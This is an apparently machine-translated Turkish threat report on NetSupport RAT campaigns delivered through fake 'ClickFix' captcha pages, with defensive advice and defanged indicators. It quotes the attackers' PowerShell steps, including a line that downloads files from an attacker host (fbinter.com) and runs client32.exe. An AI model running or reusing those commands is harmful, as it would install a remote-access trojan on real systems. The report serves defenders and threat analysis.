Siber güvenlik uzmanları, son aylarda Netsupport Uzaktan Erişim Truva Eden Truva (sıçan) kullanımında önemli bir artış gözlemlediler, bu da saldırganların tehlikeye atılmış sistemler üzerinde tam kontrol sahibi olmasını sağlayan kötü niyetli bir araç.
Etkinlikteki bu artış, kullanıcıları kötü niyetli PowerShell komutlarını yürütmeye kandıran sofistike bir sosyal mühendislik tekniği olan “ClickFix” başlangıç erişim vektörü (IAV) ile bağlantılıdır.
Başlangıçta 1989 yılında meşru bir uzaktan BT destek aracı olarak geliştirilen Netsupport Sıçanı, ekranları izlemek, klavyeleri ve fareleri kontrol etmek, dosyaları yüklemek ve indirmek ve kötü amaçlı komutlar yürütmek için siber suçlular tarafından silahlandırılmıştır.
Tespit edilmezse, fidye yazılımı saldırıları, veri ihlalleri ve iş operasyonlarının bozulması da dahil olmak üzere ciddi sonuçlara yol açabilir.
.webp)
ClickFix tekniği, tehlikeye atılan web sitelerine sahte captcha sayfaları enjekte etmeyi ve kullanıcılara PowerShell komutlarını kopyalayıp yürütmelerini öğretmeyi içerir.
Bu komutlar, saldırgan kontrolündeki ağ geçitlerine komut ve kontrol (C2) bağlantıları oluşturan Netsupport Rat istemcisini indirir ve yükler.
.webp)
Esentire analistleri, sıçan yüklerinin genellikle yolda “.png” içeren URL’lerde barındırıldığını ve C2 ağ geçidi URL’lerinin sıklıkla “fakeurl.htm” ı içerdiğini keşfettiler.
.webp)
Saldırı analizi
ClickFix saldırılarında kullanılan PowerShell betiği genellikle aşağıdaki adımları içerir:-
- Rastgele klasör oluşturma:
$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | ForEach-Object {[char]$_})
$randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName
New-Item -ItemType Directory -Path $randomFolderPath- Sıçan bileşenlerini indirme:-
$url = "http://fbinter.com/a/1.png"
$file = $randomFolderPath + "\client32.ini"
Invoke-WebRequest $url -OutFile $fileBenzer komutlar gibi diğer bileşenleri indirmek için kullanılır client32.exe ve yapılandırma dosyaları.
- Sıçanı yürütmek:-
$file12 = $randomFolderPath + "\client32.exe"
Start-Process $file12.webp)
Netsupport sıçan ve ClickFix saldırılarına karşı korumak için kuruluşlar, tüm kurumsal varlıklar için uç nokta algılama ve yanıt (EDR) ajanlarını dağıtmalı ve çalışanları ClickFix gibi ortaya çıkan tehditler konusunda eğitmek için güvenlik bilinci eğitimi almalıdır.
Kullanıcı izinlerini sınırlamak bile yetkisiz yazılım kurulumlarını önlemeye yardımcı olabilir.
Kuruluşlar ayrıca RUN istemini devre dışı bırakarak ve Grup İlkesi Nesneleri (GPO) veya Windows Defender Uygulama Kontrolü (WDAC) kullanarak WScript.exe ve MSHTA.EXE’yi kısıtlayarak güvenliği artırmalıdır.
En son IOC’ler hakkında bilgi sahibi olmak ve etkili güvenlik kontrolleri uygulamak, bu sofistike tehditlere karşı korunmak için çok önemlidir.
Uzlaşma Göstergeleri (IOCS)
- ClickFix sayfaları:
- HXXP[://]EVeverify[.]com/captcha[.]HTML
- Hxxps[://]eiesoft.com/ray-ifify[.]HTML
- Netsupport sıçan yükü teslimatı:
- HXXP[://]fbinter[.]com/a/1[.]png
- HXXP[://]fbinter[.]com/a/2[.]png
- HXXP[://]fbinter[.]com/a/3[.]png
Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free